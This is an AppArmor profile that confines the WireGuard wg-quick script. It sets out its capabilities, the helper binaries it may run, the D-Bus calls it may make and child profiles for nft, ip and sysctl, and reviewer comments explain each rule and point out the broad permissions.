Current File : /etc/apparmor.d//wg-quick
#------------------------------------------------------------------
#    Copyright (C) 2024 Canonical Ltd.
#
#    This program is free software; you can redistribute it and/or
#    modify it under the terms of version 2 of the GNU General Public
#    License published by the Free Software Foundation.
#------------------------------------------------------------------
# vim: ft=apparmor
#
abi <abi/4.0>,

include <tunables/global>

# Confines /usr/bin/wg-quick. attach_disconnected lets paths that are
# disconnected from the process's namespace be mediated as if attached at "/".
profile wg-quick /usr/bin/wg-quick flags=(attach_disconnected) {
  include <abstractions/base>
  include <abstractions/consoles>

  # dac_read_search bypasses file read and directory search permission checks;
  # net_admin covers network administration (interfaces, routing, firewall).
  capability dac_read_search,
  capability net_admin,

  # Network access rules: netlink raw and unix stream sockets
  network netlink raw,
  network unix stream,

  # Run wg under its own "wg" profile, which is defined outside this file.
  # Lowercase px does not scrub the environment on the transition.
  file mrpx /usr/bin/wg -> wg,

  # Binaries called from within wg-quick. ix makes each one inherit this
  # profile, so it runs with the same capabilities and file access as wg-quick
  # itself (including the rw rule on the wireguard directory below).
  file mrix /usr/bin/readlink,
  file mrix /usr/bin/stat,
  file mrix /usr/bin/cat,
  file mrix /usr/bin/rm,
  file mrix /usr/bin/mv,
  file mrix /usr/bin/sync,
  file mrix /usr/bin/sort,
  file mrix /usr/sbin/xtables-nft-multi,
  file mrix /usr/bin/resolvectl,
  file mrix /usr/sbin/resolvconf,

  # dbus access: the system bus socket itself
  file rw @{run}/dbus/system_bus_socket,

  # Permits sending SetLinkDNSEx and SetLinkDomains (brace alternation) to
  # org.freedesktop.resolve1.Manager; the peer must be labelled unconfined.
  dbus (send)
      bus=system
      path=/org/freedesktop/resolve1
      interface=org.freedesktop.resolve1.Manager
      member="SetLink{DNSEx,Domains}"
      peer=(name=org.freedesktop.resolve1, label=unconfined),

  # Permits the Hello call to the bus daemon (org.freedesktop.DBus).
  dbus (send)
      bus=system
      path=/org/freedesktop/DBus
      interface=org.freedesktop.DBus
      member="Hello"
      peer=(name=org.freedesktop.DBus, label=unconfined),

  # Sub-profile for nft tool restrictions. Cx transitions to the child profile
  # below and scrubs the environment (uppercase C). The child has its own rule
  # set; rules from the enclosing wg-quick profile do not apply inside it.
  file mrCx /usr/sbin/nft,
  profile nft /usr/sbin/nft {
    include <abstractions/base> 

    capability net_admin,

    # Allow executable mapping and read for the binary
    file mr /usr/sbin/nft,

    # Network access rules
    network netlink raw,

    # Read-only lookup tables under /usr/share/iproute2
    file r /usr/share/iproute2/rt_realms,
    file r /usr/share/iproute2/group,
  }

  # Sub-profile for IP tool restrictions (Cx: child profile, environment scrubbed)
  file mrCx /usr/bin/ip,
  profile ip /usr/bin/ip {
    include <abstractions/base>

    # sys_module permits loading and unloading kernel modules, the broadest
    # capability granted anywhere in this file.
    # NOTE(review): presumably needed so ip can pull in the wireguard module
    # when the link is created; confirm before narrowing or copying this rule.
    capability net_admin,
    capability sys_module,

    # Allow executable mapping and read for the binary
    file mr /usr/bin/ip,

    # Network access rules
    network netlink raw,

    # Read-only iproute2 tables and network namespace entries under @{run}/netns
    file r /usr/share/iproute2/group,
    file r /usr/share/iproute2/rt_tables,
    file r @{run}/netns/{,**},
  }
  
  # Sub-profile for sysctl tool restrictions (Cx: child profile, environment scrubbed)
  file mrCx /usr/sbin/sysctl,
  profile sysctl /usr/sbin/sysctl {
    include <abstractions/base> 
    
    # Allow executable mapping and read for the binary
    file mr /usr/sbin/sysctl,
 
    # The single explicit write rule in this child: the src_valid_mark sysctl
    file w @{PROC}/sys/net/ipv4/conf/all/src_valid_mark,
  }

  # wireguard configuration and key files: read AND write on the directory and
  # everything beneath it. Because the ix helpers above inherit this profile,
  # they get the same access to the key material.
  # NOTE(review): hook commands set in a wg-quick configuration would presumably
  # run under this profile too, limited to the exec rules above; confirm.
  file rw @{etc_rw}/wireguard/{,**},

  # Allow executable mapping and read for the binary
  file mr /usr/bin/wg-quick,

  # Process-specific access
  file r @{PROC}/@{pid}/net/ip_tables_names,

  # Site-specific additions and overrides. See local/README for details.
  # If local/wg-quick exists its rules are merged into this profile, so include
  # that file when auditing what wg-quick is allowed to do.
  include if exists <local/wg-quick>
}
